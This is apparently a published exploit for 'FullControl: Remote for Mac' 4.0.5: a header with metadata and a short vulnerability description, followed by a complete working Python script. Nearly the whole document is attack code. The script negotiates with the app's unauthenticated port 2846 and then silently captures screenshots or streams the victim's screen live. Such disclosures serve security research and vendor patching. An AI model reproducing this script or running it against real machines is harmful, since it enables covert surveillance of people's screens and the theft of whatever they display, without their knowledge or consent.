# Exploit Title: FullControl: Remote for Mac 4.0.5 - Unauthenticated Screen
Capture Exploit
# Date: 29/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://fullcontrol.cescobaz.com/
# Software Link:
https://apps.apple.com/us/app/fullcontrol-remote-for-mac/id347857890
# Version: 4.0.5
# Tested on: macOS 14.4 Sonoma
'''
Description:
"FullControl: Remote for Mac" 4.0.5 is vulnerable to unauthenticated remote
screenshot capture and live screen streaming due to a lack of
authentication on TCP port 2846. The exploit allows attackers to silently
capture screenshots or continuously stream the victim's screen in real-time
without requiring any credentials
'''
import socket
import time
import argparse
import cv2
import numpy as np
HOST = '192.168.8.103'
PORT = 2846
DEBUG = False
TIMEOUT = 30.0
MAX_JPEG_SIZE = 10 * 1024 * 1024
FLUSH_TIMEOUT = 0.5
NEGOTIATION_PACKETS = [
'accessibilityAPIEnabled',
'protocol',
'API_level',
'fc',
'os',
'json2',
'version',
'fc',
'os',
'device',
'FullControl',
'4.2.0',
'4.2.0',
'26.0',
'Attacker',
]
class ScreenshotTaker:
def __init__(self, host=HOST, port=PORT):
self.host = host
self.port = port
self.sock = None
self.request = (
'{"Class":"Request","Id":19,"Type":"screenshot",'
'"Arguments":{"size":"1906.000000;914.000000","quality":0.8,'
'"rect":"0.000000;0.000000;1906.000000;914.000000","followMouse":1}}'
)
def save_screenshot(self, data, filename_prefix="screenshot"):
if not data:
return False
timestamp = int(time.time())
filename = f"{filename_prefix}_{timestamp}.jpg"
try:
with open(filename, 'wb') as f:
f.write(data)
print(f"[+] Saved {len(data)} bytes as {filename}")
return True
except Exception as e:
print(f"[!] Error saving file: {e}")
return False
def flush_input_buffer(self, sock):
if sock is None:
return
original_timeout = sock.gettimeout()
sock.settimeout(FLUSH_TIMEOUT)
try:
while True:
data = sock.recv(16384)
if not data:
break
except (socket.timeout, BlockingIOError):
pass
except Exception:
pass
finally:
sock.settimeout(original_timeout)
def receive_screenshot(self, sock):
print("[*] Receiving screenshot data...")
buffer = bytearray()
start_time = time.time()
jpeg_start = -1
while time.time() - start_time < TIMEOUT:
try:
chunk = sock.recv(16384)
if not chunk:
break
buffer.extend(chunk)
if jpeg_start == -1:
jpeg_start = buffer.find(b'\xff\xd8')
if jpeg_start != -1:
del buffer[:jpeg_start]
jpeg_start = 0
if jpeg_start != -1:
jpeg_end = buffer.find(b'\xff\xd9', jpeg_start)
if jpeg_end != -1:
jpeg_end += 2
return buffer[:jpeg_end]
if len(buffer) > MAX_JPEG_SIZE:
print("[!] Exceeded max JPEG size")
return None
except socket.timeout:
break
except Exception as e:
print(f"[!] Receive error: {e}")
break
return None
def connect_and_negotiate(self, sock):
for pkt in NEGOTIATION_PACKETS:
try:
sock.sendall(pkt.encode())
time.sleep(0.01)
except Exception as e:
print(f"[!] Negotiation failed: {e}")
return False
return True
def capture(self):
try:
with socket.create_connection((self.host, self.port),
timeout=TIMEOUT) as sock:
if not self.connect_and_negotiate(sock):
return
time.sleep(1.5)
self.flush_input_buffer(sock)
sock.sendall(self.request.encode())
if screenshot := self.receive_screenshot(sock):
self.save_screenshot(screenshot)
else:
print("[!] Failed to receive screenshot")
except (socket.timeout, ConnectionError) as e:
print(f"[!] Connection error: {e}")
except Exception as e:
print(f"[!] Unexpected error: {e}")
class LiveStreamer:
def __init__(self, host=HOST, port=PORT):
self.host = host
self.port = port
self.sock = None
self.buffer = bytearray()
self.request = (
'{"Class":"Request","Id":20,"Type":"screenshot",'
'"Arguments":{"size":"372.000000;178.388248","quality":0.8,'
'"rect":"0.000000;0.000000;1906.000000;914.000000","followMouse":1}}'
)
self.frame_timeout = 3.0
self.retry_delay = 1.0
def flush_input_buffer(self, sock):
if sock is None:
return
original_timeout = sock.gettimeout()
sock.settimeout(FLUSH_TIMEOUT)
try:
while True:
data = sock.recv(16384)
if not data:
break
except (socket.timeout, BlockingIOError):
pass
except Exception:
pass
finally:
sock.settimeout(original_timeout)
def connect_and_negotiate(self, sock):
max_retries = 3
for attempt in range(max_retries):
try:
for pkt in NEGOTIATION_PACKETS:
sock.sendall(pkt.encode())
time.sleep(0.01)
return True
except Exception as e:
if attempt == max_retries - 1:
print(f"[!] Negotiation failed: {e}")
return False
print(f"[!] Negotiation attempt {attempt + 1} failed,
retrying...")
time.sleep(self.retry_delay)
def _ensure_connection(self):
try:
if self.sock is None:
self.sock = socket.create_connection((self.host,
self.port), timeout=TIMEOUT)
if not self.connect_and_negotiate(self.sock):
return False
time.sleep(1.5)
self.flush_input_buffer(self.sock)
return True
except Exception as e:
print(f"[!] Connection error: {e}")
self._close_connection()
return False
def _close_connection(self):
if self.sock:
try:
self.sock.close()
except Exception:
pass
self.sock = None
def _receive_frame(self):
start_time = time.time()
jpeg_start = -1
while time.time() - start_time < self.frame_timeout:
if jpeg_start == -1:
jpeg_start = self.buffer.find(b'\xff\xd8')
if jpeg_start >= 0:
del self.buffer[:jpeg_start]
jpeg_start = 0
if jpeg_start != -1:
jpeg_end = self.buffer.find(b'\xff\xd9', jpeg_start)
if jpeg_end >= 0:
jpeg_end += 2
frame = self.buffer[:jpeg_end]
del self.buffer[:jpeg_end]
return frame
try:
if not self._ensure_connection():
return None
chunk = self.sock.recv(16384)
if not chunk:
print("[!] Connection closed by server")
self._close_connection()
return None
self.buffer.extend(chunk)
except socket.timeout:
continue
except Exception as e:
print(f"[!] Receive error: {e}")
self._close_connection()
return None
print("[!] Frame receive timeout")
return None
def stream(self):
window_name = "Live Stream"
cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)
cv2.resizeWindow(window_name, 800, 600)
frame_count = 0
last_frame_time = time.time()
try:
while True:
try:
if not self._ensure_connection():
print("[!] Reconnecting in 2 seconds...")
time.sleep(2.0)
continue
self.sock.sendall(self.request.encode())
except Exception as e:
print(f"[!] Send error: {e}")
self._close_connection()
time.sleep(1.0)
continue
frame_data = self._receive_frame()
if frame_data is None:
self._close_connection()
time.sleep(1.0)
continue
try:
img_array = np.frombuffer(frame_data, dtype=np.uint8)
img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)
if img is not None:
cv2.imshow(window_name, img)
frame_count += 1
now = time.time()
elapsed = now - last_frame_time
if elapsed >= 1.0:
fps = frame_count / elapsed
print(f"\r[+] Streaming - FPS: {fps:.1f}",
end="")
frame_count = 0
last_frame_time = now
except Exception as e:
print(f"[!] Image processing error: {e}")
if cv2.waitKey(1) & 0xFF == ord('q'):
break
except KeyboardInterrupt:
print("\n[!] Stream interrupted by user")
finally:
self._close_connection()
cv2.destroyAllWindows()
print("\n[+] Stream ended")
def main():
parser = argparse.ArgumentParser(description='Capture device
screenshots or stream live video')
parser.add_argument('--mode', choices=['screenshot', 'live'],
default='screenshot',
help='Operation mode: screenshot or live streaming')
args = parser.parse_args()
if args.mode == 'screenshot':
taker = ScreenshotTaker()
taker.capture()
elif args.mode == 'live':
streamer = LiveStreamer()
streamer.stream()
if __name__ == "__main__":
main()